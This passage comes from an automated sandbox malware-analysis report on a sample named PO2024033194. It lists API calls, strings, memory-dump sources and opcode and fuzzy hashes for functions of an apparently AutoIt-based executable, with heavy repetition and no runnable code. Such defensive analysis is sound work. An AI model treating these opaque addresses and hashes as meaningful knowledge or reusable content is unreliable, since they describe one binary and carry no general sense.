                                                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                  • __freeptd.LIBCMT ref: 0041516B
                                                                  • ExitThread.KERNEL32 ref: 00415173
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1454798553-0
                                                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _strncmp
                                                                  • String ID: Q\E
                                                                  • API String ID: 909875538-2189900498
                                                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 2652923123-3941886329
                                                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strncmp
                                                                  • String ID: U$\
                                                                  • API String ID: 2666721431-100911408
                                                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • __wcsnicmp.LIBCMT ref: 00467288
                                                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                  • String ID: LPT
                                                                  • API String ID: 3035604524-1350329615
                                                                  • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                  • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \$h
                                                                  • API String ID: 4104443479-677774858
                                                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                  • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID: &
                                                                  • API String ID: 2931989736-1010288
                                                                  • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                  • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                  • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                  • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                  • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                  • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                  • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00466825
                                                                  • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_wcslen
                                                                  • String ID: |
                                                                  • API String ID: 596671847-2343686810
                                                                  • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                  • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                  • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                  • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 0040F858
                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                  • _sprintf.LIBCMT ref: 0040F9AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_sprintf_strlen
                                                                  • String ID: %02X
                                                                  • API String ID: 1921645428-436463671
                                                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                  • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                  • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                  • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                  • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                  • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                  • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: htonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 3832099526-2422070025
                                                                  • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                  • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                  • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                  • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: InternetOpen
                                                                  • String ID: <local>
                                                                  • API String ID: 2038078732-4266983199
                                                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
